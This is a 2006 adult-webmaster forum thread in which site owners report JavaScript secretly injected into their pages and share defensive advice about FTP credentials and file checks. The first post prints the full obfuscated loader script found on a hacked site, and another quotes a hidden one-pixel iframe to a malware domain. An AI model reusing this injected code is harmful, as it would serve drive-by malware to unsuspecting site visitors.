|   |   |   | ||||
| Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. | 
|    | 
| 
 | |||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. | 
|  | Thread Tools | 
|  07-06-2006, 10:45 AM | #1 | 
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | 
				
				Virus alert on new sologirl site
			 Checked out a new sologirl site which gave me a virus alert: "signature of js/shellcode virus found" which seems to be some kind of trojan. Contacted the owner who said that he wasn't aware of any javascript on his site. However, this piece of javascript was removed from his site minutes after I had contacted him: <script language="JavaScript"> e = '0x00' + '29';str1 = "%92%CA%C1%DC%B6%DB%DA%D1%C2%CD%95%88%DC%C1%DB%C1% C8%C1%C2%C1%DA%D1%90%CE%C1%CA%CA%CD%C4%88%94%92%C1 %CC%D8%C9%C5%CD%B6%DB%D8%CB%95%88%CE%DA%DA%C6%90%8 7%87%CA%C4%DC%85%CB%C7%DD%C4%DA%CD%D8%84%CB%C7%C5% 87%CA%C4%DC%9B%87%88%B6%DF%C1%CA%DA%CE%95%99%B6%CE %CD%C1%CF%CE%DA%95%99%94%92%87%C1%CC%D8%C9%C5%CD%9 4%92%87%CA%C1%DC%94%B6%A5%A0";str=tmp='';for(i=0;i <str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str); </script> Can anyone do something with this? Any idea what this js/shellcode virus is? Just trying to find out what's going on. 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | 
|   |           | 
|  07-06-2006, 10:46 AM | #2 | 
| Confirmed User Join Date: Apr 2006 
					Posts: 182
				 | Thats shitty   | 
|   |           | 
|  07-06-2006, 10:57 AM | #3 | 
| Confirmed User Join Date: Mar 2004 Location: → → → 
					Posts: 1,717
				 | Another one that bvelongs to dnv-counter-- <div style="visibility  dden"><i frame src="ht://dnv- counter.com/dnv3/" width=1 height=1></iframe></div> | 
|   |           | 
|  07-06-2006, 10:59 AM | #4 | 
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | Thanks - any problems with that? Or was the virus alert something else? 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | 
|   |           | 
|  07-06-2006, 11:05 AM | #5 | 
| Confirmed User Join Date: Mar 2004 Location: → → → 
					Posts: 1,717
				 | oh yeah, it's trouble for sure.  There are a lot of threads about this.  Hacking 'open' scripts and inserting the code(s) into templates, etc.. | 
|   |           | 
|  07-06-2006, 11:07 AM | #6 | 
| Die With Your Boots On Join Date: Oct 2003 Location: Hawaii 
					Posts: 22,872
				 | What site did you find that on? 
				__________________   | 
|   |           | 
|  07-06-2006, 11:31 AM | #7 | |
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | Quote: 
 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | |
|   |           | 
|  07-06-2006, 11:34 AM | #8 | |
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | Quote: 
 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | |
|   |           | 
|  07-06-2006, 11:42 AM | #9 | 
| Confirmed User Join Date: Feb 2002 Location: New Jersey 
					Posts: 1,401
				 | I've had that script installed on a couple of my sites and have been trying to track down how it's getting done. The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening. Anyone got any info? - PornAddict | 
|   |           | 
|  07-06-2006, 11:52 AM | #10 | |
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | Quote: 
 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | |
|   |           | 
|  07-06-2006, 11:56 AM | #11 | 
| Confirmed User Join Date: Mar 2004 Location: → → → 
					Posts: 1,717
				 | http://www.google.com/search?hl=en&l...dnv-counter%22 As GFY search is just about worthless, this google link is the best I can do. Yes, I believe for the most part, that these scripts are part of a hack and not the webmaster doing it on purpose. There are several webmasters on this board that have been hit. There was a poster the other day that had a bit of info n this company, but I don't remember the username, or the post.. so maybe the bump will let them find you  | 
|   |           | 
|  07-06-2006, 11:58 AM | #12 | 
| JuicyDevils.gr Owner Industry Role:  Join Date: Jan 2004 Location: Greece 
					Posts: 25,415
				 | I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...   | 
|   |           | 
|  07-06-2006, 11:58 AM | #13 | |
| Confirmed User Join Date: Feb 2002 Location: New Jersey 
					Posts: 1,401
				 | Quote: 
 It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply. I wish there were something more I can do but I'm screwed at the moment. - PornAddict | |
|   |           | 
|  07-06-2006, 11:59 AM | #14 | |
| Confirmed User Join Date: Mar 2004 Location: → → → 
					Posts: 1,717
				 | Quote: 
 | |
|   |           | 
|  07-06-2006, 12:10 PM | #15 | |
| Confirmed User Join Date: Feb 2002 Location: New Jersey 
					Posts: 1,401
				 | Quote: 
 - PornAddict | |
|   |           | 
|  07-06-2006, 12:20 PM | #16 | |
| Damn Right I Kiss Ass! Industry Role:  Join Date: Dec 2003 Location: Cowtown, USA 
					Posts: 32,421
				 | Quote: 
 | |
|   |           | 
|  07-06-2006, 12:26 PM | #17 | 
| Join Date: May 2002 Location: Montreal 
					Posts: 6,797
				 | We had that code on two of our TGP's. ICQ me if you want details, 161 375 873 thx, Ray 
				__________________ | 
|   |           | 
|  07-06-2006, 12:27 PM | #18 | 
| Confirmed User Industry Role:  Join Date: Jul 2003 Location: In the middle of nowhere... 
					Posts: 1,974
				 | Had the same problem some days ago and discussed it on another board. I remember that the same script problem was brought to GFY because I posted in that thread. | 
|   |           | 
|  07-06-2006, 12:38 PM | #19 | |
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | Quote: 
 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | |
|   |           | 
|  07-06-2006, 12:41 PM | #20 | 
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | 
|   |           | 
|  07-06-2006, 12:48 PM | #21 | |
| Confirmed User Join Date: Feb 2002 Location: New Jersey 
					Posts: 1,401
				 | Quote: 
 The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats). It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again. So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening. I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection. The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up. - PornAddict | |
|   |           | 
|  07-06-2006, 01:00 PM | #22 | 
| Confirmed User Industry Role:  Join Date: Jul 2003 Location: In the middle of nowhere... 
					Posts: 1,974
				 | I had the hosting company looking for attacks, too. They didn´t find any. I don´t run scripts except a tgp script, but that site wasn´t involved in the attack. The only way to get it on my server was using ftp, I think. So I changed logins and passwords and limited ftp to a single account. Until now I didn´t get the script again. | 
|   |           | 
|  07-06-2006, 01:01 PM | #23 | 
| Too lazy to set a custom title Join Date: Apr 2006 Location: pink adult dreams 
					Posts: 13,557
				 | that is so nasty! | 
|   |           | 
|  07-06-2006, 01:04 PM | #24 | 
| Too lazy to set a custom title Industry Role:  Join Date: Dec 2004 Location: Happy in the dark. 
					Posts: 93,652
				 | Fuckers   !! 
				__________________ Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted Windows VPS now available Great for TSS, Nifty Stats, remote work, virtual assistants, etc. | 
|   |           | 
|  07-06-2006, 01:06 PM | #25 | 
| ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer 
					Posts: 28,609
				 | theres quite a few different script being hit , one of the noteable is wordpress , and once a site is sompromised you might as well consider the whole server compromised.. if you are affected and your host cant do anything or wont hit me up on icq. 
				__________________ hatisblack at yahoo.com | 
|   |           | 
|  07-06-2006, 01:09 PM | #26 | 
| I like Dutch Girls Join Date: Feb 2003 Location: dutchteencash.com 
					Posts: 21,684
				 | yeah fucking js script had it too - hope youll solve it soon 
				__________________  ICQ 16 91 547 - SKYPE dutchteencash bob AT dutchteencash DOT com ... did you see our newest Sweet Natural Girl Priscilla (18)? | 
|   |           | 
|  07-06-2006, 01:15 PM | #27 | 
| Confirmed User Join Date: Jul 2003 
					Posts: 646
				 | There's more on http://www.******************/index.php?showtopic=2559 Isn't it possible to take that dnv-counter.com domain out? 
				__________________  ****Teen Harbour**** - Home of Little Caprice ------------------------------------------------------------------- In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship. | 
|   |           | 
|  07-06-2006, 04:02 PM | #28 | |
| Damn Right I Kiss Ass! Industry Role:  Join Date: Dec 2003 Location: Cowtown, USA 
					Posts: 32,421
				 | Quote: 
 | |
|   |           | 
|  07-06-2006, 04:26 PM | #29 | 
| Confirmed User Join Date: Feb 2005 Location: ICQ: 326073684 AIM: NastyNedsPics YM: n3media MSN: [email protected] 
					Posts: 119
				 | First, I want to thank Maxxxxx for protecting my identity... it was on one of my sites that he found this shit.  I talked to my host... and he didn't want to implicate anybody... but he said that when CC Bill's system was breached a while back (and no one's blaming CC Bill for any of this - it's the asshole hacks who perpetrated it), that this problem started occurring on about 95% of their sites... possibly from the fact that CC Bill has FTP access to all of our servers.  This shit keeps coming back because the dickheads keep loading it onto your server every 2 or 3 weeks, or so.  His recommendation was check your files on your local host... clean them out... and make a habit of uploading your clean files every day... and also... ...CHANGE YOUR FTP PASSWORD!!! When you put up a new site with ANY webmerchant, change your/their password until you get through the approval process... once you get approved... change it back. That should stop these pricks right in their tracks. (until they figure out something new) Make sense? | 
|   |           | 
|  07-07-2006, 01:28 PM | #30 | 
| Damn Right I Kiss Ass! Industry Role:  Join Date: Dec 2003 Location: Cowtown, USA 
					Posts: 32,421
				 | Also install FTP on a non standard port... They come in via scripts and it is all automated... Also, don't give your processor FTP access. Or allow them access on a seperate account you created just for them and then disable it after the initial setup. | 
|   |           | 
|  07-07-2006, 02:00 PM | #31 | |
| Confirmed User Join Date: Jul 2004 Location: Tampa Bay 
					Posts: 6,019
				 | Quote: 
 | |
|   |           |